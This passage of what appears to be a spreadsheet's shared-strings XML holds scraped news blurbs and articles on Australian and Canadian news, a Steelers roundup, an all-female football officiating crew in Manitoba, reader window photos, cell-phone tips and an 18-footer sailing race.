    <t>Austin Health chief executive Sue Shilbury resigns after just three years in the role, telling staff of her "difficult decision" to leave after a series of negative reports involving the Austin Hospital.</t>
  </si>
  <si>
    <t>In his Australian solo debut, JPEGMAFIA showed an unwavering commitment to showmanship.</t>
  </si>
  <si>
    <t>Michael Collett</t>
  </si>
  <si>
    <t>One footballer's wife has accused another of leaking stories about them to the media. But it's the stunning way it happened that set Twitter alight.</t>
  </si>
  <si>
    <t>Tradies are defying ­increased scrutiny from the workplace safety watchdog by dicing with death and tampering with critical scaffolding components.</t>
  </si>
  <si>
    <t>Mii Channel, lekin har bir eslatma f-so'zdir. Sinxronlashtirilmagan versiya: https://www.dropbox.com/s/u830eus7fnncqs6/Roomie%20-%20Mii%20Channel%20Fuck.wav?dl=0 Rahmat Pewdiepie: https://www.youtube.com/user/PewDiePie Ishlatilgan video manbasi: https://www.youtube.com/watch?v=D7Bi1HNmwNk Ajralish serveri: https://discordapp.com/invite/6AFzy6p […] The post Mii Channel, lekin har bir eslatma f-so'zdir appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>A CAR DRIVER has been caught swerving to hit a puddle to splash innocent pedestrians in shocking new footage – and now the driver faces a £5000 fine for their actions. Daily Express :: Cars Feed</t>
  </si>
  <si>
    <t>‘Each one of us white people must commit to being anti-racist.’ Fixed that for you. O’ROURKE: “And we decide that there will be no fear as we rewrite this country’s immigration laws in our own image, legalizing America, beginning with more than a million DREAMers by making them U.S. citizens in this, their home country, […]</t>
  </si>
  <si>
    <t>Source: https://www.bbc.co.uk/news/newsbeat-50087440 League of Legends boss: ‘It’s not for casual players’ Newsbeat sits down with the boss of Riot Games as they celebrate 10 years of League of Legends. Source: https://www.bbc.co.uk/news/newsbeat-50087440 The post League of Legends boss: ‘It’s not for casual players’ appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>david-grossman</t>
  </si>
  <si>
    <t>It was game day excitement with some jitters thrown in, too. Two under-12 age football teams met, the objective was to win – and the challenge, to implement a game plan, focus on scoring opportunities, avoid penalties, and hold the opposing team to fewer points. The anxiety and fidgeting, this time, had nothing to do with the players, but more about something that involved five individuals about to make history – and in a long anticipated welcome sight. Indeed, there was something fascinating, and quite unique in this game, that occurred just south of the Assiniboine River in Winnipeg. It happened on the gridiron at Corydon Community Centre, where the two Atom Division squads were about to play. The quintet of game officials stepping on to the field, wearing the traditional black-and white stripes, were all women. MORE FROM GROSSMAN: » B.C. high school student finds success after trying football » Christina Pitawanakwat finds confidence on gridiron » Saint Mary’s prospect chooses road less traveled » Setback not the end of football dreams for high school student Kaitlin Cummings, Krista Paradowski, Kenndy Molloy, Aashanti Tshiovo and Lauren Horvath are pictured during a game (Amanda Van Achte/Lotus Photography) In Manitoba, and quite likely in an exclusive for Canada, this was the first time an all-female crew officiated a football game. A few days before the game, Don Van Achte, the President of the Manitoba Football Referee’s Association, contacted the officiating crew, one by one, and informed them of their assignment. With on-field experience already on their resume, it was time for an all-female team. The initiative had been in the works, thanks to a summer conversation with David Low, President of the Manitoba Minor Football Association as well as Football Manitoba Executive Director, Bill Johnson, and Van Achte. “Trying to make change to something that has been around for awhile can often be one of the toughest things,” said Low. “It’s time to get with the times, show how inclusive we are and understand that football has evolved tremendously. “This is not 1950 anymore, we’ve also come a long way since the days of leather helmets. The old boys club (of officiating) isn’t an old boys club anymore.” With Low, Johnson and Van Achte well aware that the number of women playing the contact game continues to rise in their province, interest was also evident in coaching as well as other aspects of the game. For officiating, the time was right to try something new. Van Achte agrees that there is nothing wrong by creating positive opportunities for everyone. “It’s too early to tell about community reaction, but I’m excited, and so is our Executive,” said Van Achte whose group of 45 officials includes 11 women. “When women asked to get involved, we thought it would show a sign of being progressive. I like it and it would be nice if this happens across Canada.” Kennedy Molloy, studying at the University of Winnipeg, had the Referee’s white cap for the significant and memorable game. Krista Paradowski was Umpire. Lauren Horvath had the assignment of Line Judge while Aashanti Tshiovo got the nod as Field Judge. Timekeeper duties were the responsibility of Kaitlin Cummings. Football runs in the Molloy family. Her mother started a football club and her father has coached. Even her older brother is an official, but yet to wear the white cap. “When I got the assignment, I didn’t look closely at the crew,” recalled Molloy, who later received a call from Van Achte with the names of the others. “At first, I thought it was exciting, overwhelming with an all-female crew, but then realized, a game is a game and we all have a job to do.” Molloy said she’s not one for intimidation. Apparently, the message was received, as only five penalties were called in what observers called an action-packed, well-played game. “Football is what I enjoy, I’m always prepared and will imply the rules of the game as well as be tough and lenient,” she said. “People, and that includes coaches, need to understand that if you have the certification to do the job, then women need to be accepted.” “This is not 1950 anymore, we’ve also come a long way since the days of leather helmets. The old boys club (of officiating) isn’t an old boys club anymore.” David Low, President of the Manitoba Minor Football Association Field judge Aashanti Tshiovo watches a play as one of the all-female crew (Amanda Van Achte/Lotus Photography) Tshiovo knows all about football, having played, coached and now officiated. But she admitted to being a bit anxious and edgy. “I was nervous, with all the attention, but I had a good officiating crew and we approved that anyone, once qualified and understanding of the rules, can do it,” said the 16-year old who took the advice of her mother, two years ago, and learned how to become an official. “It’s a great feeling being part of this and I do it for fun. Then, after the game, to get appreciation from coaches who came by to shake our hands.” Cummings has been associated with football for nine years and, back in grade 9, was a top-notch school wrestler. “Football has become No. 1 for me,” said Cummings. “I have taken courses and studied officiating and when I put on my jersey, I trust my ability, what I have learned and am just thrilled that administrators are providing women with opportunities to officiate.” For Paradowski, in addition to being the oldest member of the historic crew, she has some solid support from her husband, a seven-year CFL veteran. “Oh yes, there are times when the discussion around the dinner table focuses on officiating and likely now with more women involved in games,” said Paradowski, who enjoys officiating seven to 16 year olds. “They may know us as officials, but we’re more teachers of the game, giving advice along with warnings of how to play, follow the rules and have fun.” Horvath has witnessed stereotyping in sport and so, when the opportunity came to officiate, she put away her competitive Highlander cultural Scottish dancing shoes, and turned to football gear. “Players and coaches have an oath to respect officials – and we can make mistakes, but I’ve also been called out, too, for not throwing a enough penalty flags,” said Horvath. “There are times when you hear comments from the spectators, but you keep your work face on, focus and, when it happens, ignore the profanity.”</t>
  </si>
  <si>
    <t>The government says it will pass a law requiring photo ID to vote. The post Voting: Could ID checks affect who participates in elections? appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Mike Postovit</t>
  </si>
  <si>
    <t>The Old Hay Bay Church is showing its age and in need of some TLC.</t>
  </si>
  <si>
    <t>Australia's John Millman has stormed into the last eight at the Japan Open, exacting a little revenge for compatriot Alex de Minaur along the way.</t>
  </si>
  <si>
    <t>Volkswagen named 67 people it believed were involved in the 2015 emissions cheating scandal that rocked the industry in documents for now-settled Australian class actions.</t>
  </si>
  <si>
    <t>Christopher Hanewinckel-USA TODAY Sports Time to check on the latest news surrounding the Pittsburgh Steelers. The Pittsburgh Steelers are moving into Week 7 of the NFL regular season, and as the team prepares to rest and recover during their bye week we continue to provide you with features, commentary and opinions to tide you over until the next game starts! Today in the black-and-gold links article we take a look at how the Steelers getting by without Stephon Tuitt will be easier said than done. Let’s get to the news: Stephon Tuitt wasn’t just having a great season, he was having an All-Pro season. Now with his season over due to a torn pectoral muscle the Steelers will have to find a way to adjust without No. 91. Steelers preparing to adjust with DE Stephon Tuitt injured, out for season By: Joe Rutter, Pittsburgh Tribune-Review Stephon Tuitt might not want to hear it now, but there is a positive that can come from enduring a season-ending pectoral injury. All the Pittsburgh Steelers defensive lineman has to do is look a few feet down his row at UPMC Rooney Sports Complex locker room for proof. In 2016, Cameron Heyward’s sixth NFL season ended after seven games because of a pectoral tear that required surgery. He rebounded the next year to record a career-high 12 sacks and become a first-team All-Pro for the first time. “You’re not going to the grave with this,” Heyward said Tuesday. “This is something you can come back from and be a better player because of it.” The irony is bittersweet. Also in his sixth season, albeit in the sixth game, Tuitt suffered a torn pectoral muscle against the Los Angeles Chargers that will require surgery and end his season. The Steelers placed the 26-year-old defensive end on the reserve/injured list Tuesday and re-signed former Steelers defensive lineman L.T. Walton to replace Tuitt on the 53-man roster. To read the full article, click HERE (Free) Stating the obvious…but Mason Rudolph should be the Steelers’ starting quarterback. Mark Madden: Nice job, Duck, but Mason Rudolph should be Steelers starting QB By: Mark Madden, Pittsburgh Tribune-Review For a third-string quarterback from a small football college who didn’t get drafted, Devlin Hodges has made considerable impact in Pittsburgh. Between his duck calls, duck T-shirt and duck tweet that included a duck video, Hodges seems ready to establish a duck dynasty. One obstacle: The moment Mason Rudolph is cleared to play, he should start. Hopefully, that’s the Steelers’ next game, Oct. 28 at home vs. Miami. That’s no knock on Hodges. He did as well as could be expected in the Steelers’ 24-17 win Sunday at Los Angeles. Hodges and the offense were greatly buoyed when the defense got the Steelers a 14-0 first-quarter lead. Hodges managed that edge from there, completing 15 of 20 passes for 132 yards, one touchdown and one interception. He had just two completions more than 5 yards past the line of scrimmage. Don’t call Canton yet. Hodges did what he was asked and did it well. But he’s not the quarterback that’s going to help you catch up in the fourth quarter. Rudolph might not be, either. But he’s got much more talent and pedigree. To read the full article, click HERE (Free) The Steelers didn’t just take over Los Angeles for Sunday Night Football, they dominated the TV ratings too. Like attendance, Pittsburgh dwarfs L.A. in ratings for Steelers-Chargers By: Chris Adamski, Pittsburgh Tribune-Review Much has been made about the high ratio of Pittsburgh Steelers fans to the “home” team Los Angeles Chargers during Sunday night’s game at Dignity Health Sports Park. The television ratings tell a similar story. According to NBC, Pittsburgh by far was the top-rated market for the Steelers’ 24-17 victory broadcast on its network. Pittsburgh households delivered a 41.9 rating (percentage of the entire market watching) and 61 share (percentage of households with TV sets in use). Los Angeles? The hometown team didn’t even register among the top 10 markets. (The caveat being that southern California neighbor San Diego – the longtime home of the Chargers until three years ago – indeed was the second-highest rated market at 17.3 with a 34 share. To read the full article, click HERE (Free) JuJu Smith-Schuster bye week media availability .@TeamJuJu spoke with the media about the ‘young guys,’ Devlin Hodges’ performance against the Chargers, the crowd in his hometown of LA &amp; more. pic.twitter.com/Nukuz7fFJX — Pittsburgh Steelers (@steelers) October 16, 2019 Around the locker room Cameron Heyward, Tyson Alualu, Isaiah Buggs, and L.T. Walton discuss the injury to Stephon Tuitt, the “next man up” mentality and more. pic.twitter.com/3p5zKqOzdi — Pittsburgh Steelers (@steelers) October 16, 2019 Social Media Madness .@Missi_Matthews, @BobLabriola, @CraigWolfley, &amp; @CharlieBatch16 talk about who should be the starting quarterback vs. Miami, who Sunday night’s unsung hero was, and go through the time capsule after our win against the Chargers. #SteelersLive pic.twitter.com/7AzWkzPolL — Pittsburgh Steelers (@steelers) October 16, 2019 On Tuesday, @ToneTime10 hosted his Third Annual Strikes Against Sickle Cell bowling tournament to raise money for research and education of sickle cell disease. pic.twitter.com/uScla2CHQV — Pittsburgh Steelers (@steelers) October 16, 2019 Missi, Bob, Craig, &amp; Charlie give an injury update, talk about Devlin Hodges, our defense, &amp; more from Sunday night’s game against the Chargers. #SteelersLive pic.twitter.com/AfBZnTD1fY — Pittsburgh Steelers (@steelers) October 15, 2019</t>
  </si>
  <si>
    <t>Gosford trainer Luke Hilton is looking to continue his consistent run of form on his home surface on Thursday.</t>
  </si>
  <si>
    <t>Barchaga salom, do'stlar. Men Nazim Zeki Uysalman. Men yangi video bilan keldim. Ushbu videoda biz sizga 2,5 yil oldin Vabis […] The post Bizda F-MAX UChUN O'YINCHILARNI O'RNATISh UChUN! appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>We love posting the photographs that reveal the views from our reader’s windows. Whether it’s a back alley in the Fall or a sandy beach in high Summer, we’re always interested in seeing what you see from your windows at home or work or through the windshield. Browse the full collection. Submitted by M.S. | “Crossing Granville St. Bridge” | 5pm Email us a recent photograph of your view with the estimated time and place to andrew [at] scoutmagazine.ca and we’ll add it to our growing collection. Cell phone shots are fine if they are at least 1600px wide. Reader T.R. | Above Coal Harbour | 6pm | Vancouver, BC Scout Central (our own view) Main St. Vancouver, BC 811pm Hastings Sunrise Vancouver, BC 745pm West End Vancouver 1030am Mt. Pleasant Vancouver 1000am West End Vancouver 1030am Woodward’s Building, Gastown Vancouver 915am Reader W.E. Venables Vancouver 447pm Reader F.R. West Vancouver, BC 5pm Reader M.S. Mosquito Creek, North Vancouver 5pm Reader S.L. Yukon and 27th Vancouver 7pm From reader O.L. Paradise Valley Squamish 1024am Reader J.M. Sentinel Hill West Vancouver 830pm Reader K.M. Hastings East Vancouver 620am Reader G.V. Commercial Drive Vancouver 1020am Reader G.P. West End Vancouver 200pm Reader J.D. Victoria Drive Vancouver 850pm Reader A.H. Commercial Drive Vancouver 100pm Reader A.F. False Creek Vancouver 805pm Reader T.L. Mt. Pleasant Vancouver 545pm Reader O.L. Catania Sicily 202pm Reader A.M. Long Beach Lodge Tofino 850pm Reader M.R. Saanich, BC 1200pm Reader J.E. Main and Kingsway Vancouver, BC 500am Reader A.H. East Vancouver, BC 932am Reader M.S. North Vancouver, BC 300am Reader J.M. Mount Pleasant Vancouver, BC 800pm Reader M.B. Maple Tree Square Vancouver, BC 107pm Reader A.C. South Granville Vancouver, BC 1134pm Reader B.B. Strathcona Vancouver, BC 1150am Reader W.U. Mt. Pleasant Vancouver, BC 915pm Reader T.D.M Naramata, BC 500pm Reader J.B Seattle, Washington, USA 915pm Reader B.M Richmond, BC Afternoon Reader M.P. 15th and Fraser Vancouver, BC 1015pm Reader K.K. Naramata Bench The Okanagan Valley, BC 745pm Reader M.B. Gastown Vancouver, BC 1230pm Reader J.C. East Hastings Vancouver, BC 1230pm Reader B.R. Mackenzie Beach Tofino, BC 900am Reader G.H. Main at 16th Vancouver, BC 930am Reader JG Oakura Taranaki New Zealand 345pm Reader S.L. somewhere near Calgary, Alberta 930am Reader P.H. Dundarave West Vancouver, BC 630pm Reader S.F. Whytecliff West Vancouver, BC 1000am Reader E.E. Oak Bay Victoria, BC 530pm (2) Reader J.M. Chinatown Vancouver, BC 1145am Reader A.G. Gastown Vancouver, BC 750pm tyj Reader "M.S." Cowichan Valley, Vancouver Island, BC 4:25pm Reader G.L. Gastown Vancouver, BC 5:32pm Reader LA Tofino BC 1pm Reader DD Gabriola Island BC 758am Reader MB Outside The Bayside Bistro Parksville BC 430pm Reader VL Kitsilano Vancouver BC 345pm Reader SS mid-air over the West Side Vancouver BC 1118am Reader CS North Vancouver BC 535pm TC Lok Wah Hong Kong 1034pm Reader KF North Burnaby 730am Reader LM Ribeirao Claro Brazil 434 pm Reader ABR Mount Pleasant Vancouver BC 448pm Reader AP South Granville Vancouver BC 100 pm Reader MF Marais Rue de Temple Paris France 300 pm Reader RG Gastown Fire Escape Vancouver BC 916pm AM St Croix US Virgin Islands 1200pm Reader SD Paia Maui Hawaii USA 615pm Reader MN Amman Jordan 643pm Reader AR Mt Seymour from Deep Cove North Vancouver BC 430pm Reader LN Quebec St Vancouver BC 430pm Reader HS West Hollywood California USA 430pm Reader SC Hamilton St Vancouver BC 612pm Reader A Mission BC Dinner Time Reader LT Main St Vancouver BC Reader AM Copacabana Palace Hotel Rio de Janeiro Brazil 812am Reader KC Lost Lagoon Stanley Park Vancouver BC 1049am Reader MS | Woodwards Gastown Vancouver BC 612pm Reader DB Shangri La Hotel Jakarta Indonesia 553am Reader LV Downtown Cambie St Vancouver BC 2:20pm Reader S.Y. Clark at 3rd Vancouver, BC 6:30pm Reader J.C. Siena, Italy 6:30pm Reader C.W. The Village at False Creek Vancouver, BC 4:25pm Reader C.J. | Water &amp; Cambie | Vancouver, BC | 2:00pm Reader D.B. The Westin, Paris, France 12:00pm Reader T.G. | I am crying. My city is on fire. | Vancouver, BC | 9:30pm Reader S.D | Victory Square | Vancouver, BC | 5:30pm Reader J.I. | Overlooking the lake | Osoyoos, BC | 7:45pm Reader J.R. | East Van Apartment | Vancouver, BC | 7:45pm Reader C.W. | English Bay | Vancouver, BC | 6:00pm Reader C.L. | Keefer Place | Vancouver, BC | 12:55pm Reader S.K. | Looking West towards Lighthouse Park | West Vancouver, BC | 2:37pm Reader J.I. | Sooke, BC | 7:30pm Reader N.F. | Gassy jack Square, Gastown | Vancouver, BC 12:11pm Reader A.L. | Taipei, Taiwan | 6:00am Reader P.K. | Railway Tracks, Gastown | Vancouver, BC | 10:47am Reader M.N. | Returning from Protection Island | 2:00pm A.M. | Summerland, BC | 9:12pm Reader P.D. | Little Elbow Campground, Kananaskis Country | Alberta | 9:02am Reader S.H. | Gagliano Aterno, Abruzzo | Italy | 1:00am Reader K.M. | Kensington Market | Toronto, Ontario | 1:00pm Reader J.I. | Nita Lake | Whistler, BC | 5:45pm Reader I.F. | Petrovac, Montenegro | 10:35am Reader J.M. | Sakinaw Lake | Sunshine Coast, BC | 10:54am Reader M.K. | Crosstown | Vancouver, BC | 3:20pm Reader S.C. | Strathcona | Vancouver, BC | 4:15pm | SHARE YOUR VIEW Reader G.G. | Yaletown | Vancouver, BC | 11:33am Reader S.S. | On a train near Interlaken | Switzerland | 10:21am Reader J.G. | Cambie &amp; 17th | Vancouver, BC | 3:10am Reader K.P. | Strathcona | Vancouver, BC | 8:30am Reader T.V. | Parker St. Studios | East Vancouver, BC | 5:00pm Reader L.A. | Hawks &amp; Pender, Strathcona | East Vancouver, BC | 7:16am Reader L.A. | Willow's Beach | Victoria, BC | 4:30pm Reader I.H. | Regal Kowloon Hotel | Hong Kong | 8:45pm Reader B.M. | Blood Alley, Gastown |Vancouver, BC | 10:45am Reader C.T. | Fraser River | Vancouver, BC | 8:08am Reader V.C. | BC Place Sunrise | Vancouver, BC | 8:25am Reader S.W. | Lonsdale Quay | North Vancouver, BC | 1:30pm Reader R.W. | Buenos Aires, Capital Federal | Argentina | 6:10am Reader D.G. | Gastown, Vancouver | 4:35pm Reader H.P. | Main &amp; 5th | Vancouver, BC | 10:00am Reader E.S. | Art Department, Mammoth Studios | Vancouver, BC Reader A.V. | Harbour Center | Vancouver, BC | 3:48pm Reader M.K. | Victoria Drive | Vancouver, BC | 4:10pm R.K. | Eagles eyeing crow's nest | 5th Avenue, Kitsilano | Vancouver, BC | 11:00am From Z.H. | West End | Vancouver, BC | 4pm From D.P. | West Broadway/Fairview | Vancouver, BC | 4pm From K.L. | Hastings &amp; Boundary | Vancouver, BC From R.M. | Wailea, Hawaii | USA | E.D. | Graveley &amp; Woodland | Vancouver, BC | 3:06pm S.Y. | Victory Square | Vancouver, BC | 3:39pm From D.D. | Carrall &amp; Cordova in Gastown | Vancouver, BC | 11:14pm From S.S. | Dunsmuir | Vancouver, BC | 6:30am From R.J.R | East Hastings (Hastings-Sunrise) | Vancouver, BC | 6:15pm From S.L. | Sheraton Wall Center (31st Floor) | Vancouver, BC | 9:36m From K.Y. | Waterfront (Harbour Centre) | Vancouver, BC | 6:15am R.B. | Davie Village | Vancouver, BC | 7:30pm From C.W. | Deltascoot Scooter Rally musters | Delta, BC | 12:58pm T.L. | Washroom stall at the top of the Standard Hotel | New York, NY | 2:30pm Reader V.R. | helijet traveling from Vancouver to Victoria Reader C.C. | Pendrell Sound, BC | 7:30pm Reader M.L. | Somewhere over Canada on a flight from YYZ to YVR | 7:00am Reader G.T. | Looking west over Stanley Park from Coal Harbour | 5:00pm Reader C.F. | Chancery Place | Vancouver, BC | 10:30am Reader K.T. | Beatty Street | Yaletown | Vancouver, BC | 6:30am Reader J.S. | Somewhere Over The Rocky Mountains | 7pm Reader V.R. | Hotel Vancouver as seen from an office across the street | 3:30pm Reader R.R. | Main at 16th | Vancouver, BC | 12:26pm Reader A.T. | Seabus crossing Burrard Inlet | Vancouver, BC | 4:30pm Reader A.T. | Mount Pleasant | Vancouver, BC | 8:20am Reader A.T. | Mount Pleasant | Vancouver, BC | 8:29pm Reader C.C. | Mustique Island | St. Vincent &amp; The Grenadines | 9:30pm Reader S.B. | Wall St. | East Vancouver | 4:00pm Reader K.K. | Early morning flight from Vancouver to Kelowna | 8:00am Reader C.W. | East 4th Ave. at Commercial Drive | 3:29pm A.M. | The Marais (with peekaboo Pompidou Centre) | Paris, France | 9:00am A.N. | Fairview Slopes | Vancouver, BC | 9:30pm I.F. | In a small cottage in the village of Topola, Serbia | 12:00pm A.M. | State Line, Oregon &amp; California | 8pm Reader K.Q. | Waiting for my float plane | Ganges Harbour, Saltspring island | 7am Reader W.U. | Canmore, Alberta | 7:30am Reader K.K. | Lighthouse Pub | Nanaimo Harbour, BC | 4:58pm IMAG0678 Reader T.R. | Flying into Vancouver from Victoria | 8:00am Reader A.J. | Above Coal Harbour | 9:14am | South Granville | Vancouver, BC A.M. | Sun Tower | 12:55pm M.B. | 2:30pm | Port Kells, BC L.G. | The West End | 8:00am Reader M.C. | Passing by Livingston Island, Antarctica | 9:33am Reader H.S. | Boulevard Garibaldi | Paris, France | 4:30pm Reader A. F | False Creek | 7:45am Readers F.C. &amp; C.W. | Bidwell St. | English Bay | Vancouver, BC | 7:20pm Reader D.A. | Sunrise in Mount Pleasant | Vancouver, BC | 8pm Reader J.C. | Scout on the Goondocks | Astoria, OR | 3pm T.R. | From the bar, 52 stories up in The Shard | London, UK | 7pm Reader T.G. | Mount Pleasant near Main &amp; Broadway | Vancouver, BC | 7am Submitted by M.C.S. | BC Ferries porthole, The Salish Sea | 5pm Submitted by L.F | Montreal, QC | 1pm Submitted by J.S | Gastown, Vancouver, BC | 6:45am Submitted by K.M | East Vancouver Submitted by I.W. | Miami, Florida | 4:30pm Submitted by B.C. | Dominion Building. Vancouver, BC | 3:30pm Submitted by P.G. | Railtown | Vancouver, BC | 9:30am Submitted by R.B | 'Above Granville Street' | 4:33pm Submitted by S.B. | Viti Wines, Vancouver, BC | 11:30am Submitted by M.S. | East Vancouver, BC | 12:20pm Submitted by J.W. | Kits Point | Vancouver, BC | 9:20pm Submitted by D.D. | Taken in slightly better weather at UBC | 8:13pm Submitted by J.W. | East 2nd Ave and McLean Drive | 6:30pm Submitted by A &amp; R | Waikiki, Hawaii | 11:30pm Submitted by H.B. | Burrard &amp; Pender | 1:08pm Submitted by M.M. | Southpointe Academy | 11:49am Submitted by M.S. | 15th floor of the Shangri-La Hotel | 8:30am Submitted by J.A. | Wickaninnish Inn, Tofino, BC | 10:30am Submitted by K.L. | East Hastings St., Vancouver, BC | 8:38pm Submitted by M.D. | 675 W. Hastings, "Limited time only as 40 storey Bosa building coming up in front." | 7:27am Submitted by 'L' | Idaho Peak, New Denver, BC | 5:30pm Submitted by A.J.S | 6th Ave. and Granville St. | 7:40pm Reader F.L. | Fogo, Fogo Island, Newfoundland | 8:48 PM (NDT) Submitted by M.C.S. | Balsam St., Kitsilano | 9:20pm Submitted by F.T. | Woodlark Hotel | Portland, OR | 9pm Submitted by L.L. | Sage Hills Winery, Summerland, BC | 3pm Submitted by H.K. | Sisters, Oregon | 5pm Submitted by K.D. | Fairview, Vancouver | 3:27pm Submitted by H.H. | Strathcona, Vancouver | 10pm Submitted by A.F. | Coal Harbour, Vancouver | 6pm Submitted by S.K.S. | Mt. Pleasant, Vancouver | 8:30pm Submitted by P.G. | Downtown Vancouver | 7pm Submitted by N.T. | Philadelphia, Pennsylvania | 7am Submitted by J.R. | Chinatown, Vancouver | 1:45pm Submitted by T.S. | Driving northbound on Burrard Bridge, Vancouver | 2pm Submitted by R.A. | Chow time on set | Burnaby, BC | 4:14pm Submitted by A.J. | "From my office" | Vancouver, BC | 8:05am Submitted by M.S. | "Crossing Granville St. Bridge" | Vancouver, BC | 5pm</t>
  </si>
  <si>
    <t>Careful about watching video when you are using 4G or LTE signal. Most likely, you have a monthly data allowance that comes with your cellphone plan. Video can quickly go through the allowance and charge you more quickly. If you go over the limit fairly often, you might want to get a different plan. TIP! Be careful if you watch videos while using LTE or 4G. Your cell phone’s plan may have an allowance for the data you’re using. Would you like to buy a cell phone? Are you undecided which one will meet your needs? Many people have questions when it comes to cell phones. This piece is here to help. After reading it, you’ll understand cell phone technology better. Remember that smartphones slow down as they age. If you update your software, it can help to keep the phone running. Unfortunately, as new phones come out, the updates are more powerful. In quick order you see the smartphones get outdated due to the newer technology. TIP! If your cell phone is pretty old, it may start slowing down. Updating your phone on a regular basis can keep it from becoming obsolete. Your cell phone may or may not be destroyed by a plunge into liquid. Remove the battery and put the phone inside a bowl filled with rice. This facilitates absorption of moisture that has gotten in your device. Does your battery seem to die quickly? This can be the sign of a weak signal. Weak signals can actually kill a battery. When you are not using your phone, do not store it where you don’t have a signal, such as a drawer or closet. TIP! Is battery on your cell phone draining very fast? It’s likely that your signal is low. This can drain your battery quickly. Be very careful regarding extended warranties. Generally, these added costs are nothing more than that. Odds are good that if your cell phone is going to break down then it will happen while your original manufacturers warranty is still in operation. Additionally, you may want to upgrade your phone before the extended warranty even runs out. Extended warranties can be tricky. Such extra costs tend not to be worthwhile. Cell phones usually stop working within the first year you own them, if they’re going to malfunction at all. This is usually covered by your phone’s basic warranty. Plus, a lot of individuals get new phones on a yearly basis, so having an extended warranty is not worth it. TIP! Take your time when it comes to extending a warranty. Typically, these are really just additional cost with no real added value to you. It’s a good idea to visit actual stores and compare cell phones side by side in person. The few hours you spend will be worth it. That way, you’ll better your chances of getting a phone that you’ll enjoy. Be careful with your cell phone when you are around water. Many people drop their phones in water by mistake, which ruins them. Keep it away from hoses and faucets. Though you may be careful, you want to avoid the chance of a costly accident. TIP! Keep your cell phone away from water. It is common to accidentally drop a cell phone in a body of water and destroy it. If you are buying a smartphone, make sure you need it first. Smartphones can cost quite a bit but also offer quite a bit in return. But, certain people only require a cell phone for making calls. If you sound like such a person, then know that smartphones cost more both upfront and monthly. This could end up not being a great choice. It’s okay if you are loyal to one model or company, but do keep your eyes open towards others. You may be comfortable with that screen layout or interface, but you should stay open-minded. Considering other kinds of phones may provide you with functions that you never had before. There is no harm in checking out all of your options. Stay open minded. Trying other options may be a pleasant surprise. Avoid letting your battery run completely down before recharging it. Cell phones carry rechargeable batteries normally. The battery will not hold the charge as long if it often gets too low before you recharge it. Just get into the habit of doing it before it goes dead. Cell Phone For the latest phones, a case is probably not necessary. Smartphone manufacturers often already use hard materials such as Kevlar or even carbon fibers in the cell phone construction. Cases can help boost their strength, but they can make using the phone harder. Weigh your options carefully, and make a decision based on the kind of phone you have. TIP! The newest phones don’t always need a protective case. The bodies of modern phones such as the smartphone already have very strong material such as Kevlar and carbon fiber incorporated. The above article gave you basic information about cell phone technology. Make sure that you take notes on what you have read. Then you can go purchase a cell phone with confidence. If questions remain, seek out additional information. You can bookmark this article and return to it later. If you are bored, you can always play some games on your cell phone. These phones provide high quality graphics, so it really is possible to have a great gaming experience. Do not purchase too many games on your phone since it will negatively affect its memory. Clearly, there are many things to consider when contemplating voip dellmont . You should have a better understanding of it after reading the information here. But, be sure to keep looking, as there is a whole world of voip dellmont information.</t>
  </si>
  <si>
    <t>Stephen Strasburg and the Washington Nationals’ starters using blueprint that could help the Boston Red Sox in 2020. Source: Sports Business News</t>
  </si>
  <si>
    <t>El Camino: A Breaking Bad Movie debuts on 11 October. See full article at Film-news.co.uk » The post Aaron Paul embraced Breaking Bad return after film career struggles appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Peter Crouch’s wife Abbey Clancy revealed the story about her husband ahead of playing Newcastle United on Back of the Net This post written by Chris Knight originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>Travellers suffering jet lag avoid methods proven to remedy the condition and make things worse by drinking too much.</t>
  </si>
  <si>
    <t>In a dominant display, FC Barcelona beat Eibar by three goals to nil at the Ipurua Municipal Stadium on Saturday morning. Here’s what we learned from the tie. Source: Sports Business News</t>
  </si>
  <si>
    <t>Lisa Gilbert</t>
  </si>
  <si>
    <t>The Noakesailing team of Sean Langman, Ed Powys and Nathan Edwards had to come from behind over the final lap of the course to grab a narrow victory in Race 1 of the Australian 18 Footers League’s Spring Championship on Sydney Harbour today. After trailing the race leader The Kitchen Maker-Caesarstone for most of the day, Noakesailing grabbed the lead at the final windward set of marks to score a 32s. victory. The Kitchen Maker-Caesarstone (Jordan Girdis, Lachlan Doyle and Tom Quigley) took a 25s lead at the first windward mark and led at every rounding mark over the Easterly course, but couldn’t hold onto the lead at the final mark when the Noakesailing team were favoured by going to the middle buoy while The Kitchen Maker-Caesarstone had to go to the furthest buoy. With John Winning Jr. unable to skipper Winning Group today, former Giltinan champion Seve Jarvin took the tiller, and along with Sam Newton and Joel Turner, came home strongly to finish third, 2m33s. behind The Kitchen Maker, after having to go to the furthest mark on every lap of the course. Yandoo (John Winning) also finished strongly to grab fourth place, ahead of Vintec (Kirk Mitchell), RMarine (Marcus Ashley-Jones), Appliancesonline.com.au (Brett Van Munster), and defending champion Rag &amp; Famish Hotel (Bryce Edwards). The Easterly breeze fluctuated throughout the latter part of the race which produced a big change to many of the overall placings. The Kitchen Maker-Caesarstone took the early lead at the first set of windward marks, with Vintec in second place, followed by Noakesailing, Apppliancesonline and Birkenhead Point Marina (Tom Anderson). The TKM-Caesarstone lead was 25s at the bottom mark, but over the next lap of the course the margin had increased to 1m15s as the fleet set off on the final lap of the course. Despite their attempts to cover their challenger, The Kitchen Maker-Caesarstone team couldn’t shake off the hard-charging Noakesailing team and were 20s plus the distance between the middle and back marker buoys as the pair headed for home on the run between Shark and Clark Islands. Only one boat-length separated the pair off Double Bay before the Noakesailing team finally took the honours. With a number of new teams in the fleet and two more teams to join the competition in the coming weeks, the season the racing looks promising as the Australians prepare to mount a challenge to win back the Giltinan Championship Trophy The Australian 18 Footers League’s 2019-2020 Season continues next Sunday with Race 2 of the Spring Championship. Spectators can get up close and personal with the teams in the rigging area, then follow the racing on board the spectator ferry, which leaves Double Bay Wharf, alongside the rigging area, each race day at 2pm. Purchase tickets online at: https://www.eventbrite.com.au/e/spring-championship-race-1-tickets-69976974013?aff=ebdssbdestsearch The club’s video team will also be out on Sydney Harbour to capture all the action. Everyone in the world can experience the live stream experience by going to 18FootersTV 18 Footers TV As well as watching the livestreaming coverage, you can also follow all the club’s racing throughout the entire 2019-2020 